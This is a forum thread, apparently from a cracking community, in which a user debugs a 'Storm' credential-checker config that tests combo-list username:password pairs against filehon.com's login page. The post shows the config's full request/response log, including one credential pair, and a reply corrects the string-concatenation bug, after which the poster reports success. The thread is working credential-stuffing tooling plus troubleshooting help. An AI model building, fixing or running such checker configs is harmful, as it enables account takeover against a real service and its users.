Storm Help me..

ioiioi

Lurker
Member
Joined
Threads
24
Posts
126
Failed to recognize success account.

Authenticated as Failed All.

Success Account = dlagur128:gur128

Code:
Username: dlagur128
Password: gur128
Combo: dlagur128:gur128
Proxy: None
Proxy Type: HTTP
============

--------------

Declaring 'link' variable with 'http://filehon.com/member/loginCheck.php' value

--------------

Declaring 'heads' variable with 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://filehon.com/
Content-Type: application/x-www-form-urlencoded' value

--------------

Executing and Assigning 'CombineText("Frame_login=Ok&sReturnUri=http%253A%252F%252Ffilehon.com%252F&m_id=,$ComboUsername#,&m_pwd=,$ComboPassword#,&idSave=1")' codes to 'PostContent' variable.

Execution result: Frame_login=Ok&sReturnUri=http%253A%252F%252Ffilehon.com%252F&m_id=,$ComboUsername#,&m_pwd=,$ComboPassword#,&idSave=1

--------------
============ Stage 1 - Sent Data ============
POST /member/loginCheck.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://filehon.com/
Content-Type: application/x-www-form-urlencoded
Host: filehon.com
Connection: keep-alive
Content-Length: 117

Frame_login=Ok&sReturnUri=http%253A%252F%252Ffilehon.com%252F&m_id=,$ComboUsername#,&m_pwd=,$ComboPassword#,&idSave=1

============ Stage 1 - Received Data ============
HTTP/1.1 200 OK
Date: Sat, 14 Jul 2018 11:42:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.45
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Set-Cookie: 536131f814db9277826091e61ed00115=b24%3D; expires=Sun, 14-Jul-2019 11:42:23 GMT; path=/; domain=.filehon.com
Content-Length: 148
Connection: close
Content-Type: text/html; charset=UTF-8

=====Start Received Source=====
<script type='text/javascript'>parent.mainLoginForm.reset(); alert('등록된 회원이 아닙니다.'); parent.mainLoginForm.m_id.focus();</script>
=====End Received Source=====

--------------

Executing and Assigning 'indexof($Stage1ResponseSource#, "alert")>=0' codes to 'FailKey' variable.

Execution result: True

--------------

--------------

Executing and Assigning 'indexof($stage1responsesource#, "'http://filehon.com/charge/';")>=0' codes to 'SuccKey' variable.

Execution result: False

--------------

--------------

Executing '$SuccKey#' expression

Execution result: False

--------------

--------------

Executing '$FailKey#' expression

Execution result: True

--------------

============
Check Result: Failed
Save Format:
============
 
Last edited:
  • I
    Created
  • Last reply
  • 3
    Replies
  • 480
    Views
  • 2
    Participants
  • Participants list
You forget to add this char " between tokens in your case its $combousername# and $combopassword#

CombineText("Frame_login=Ok&sReturnUri=http%253A%252F%252Ffilehon.com%252F&m_id=",$ComboUsername#,"&m_pwd=",$ComboPassword#,"&idSave=1")
 
  • Thread Starter Thread Starter
  • #3
Sorry for not being able to speak English.
Google translation
What characters to add?
 
  • Thread Starter Thread Starter
  • #4
m1st.
It was successful.
Thank you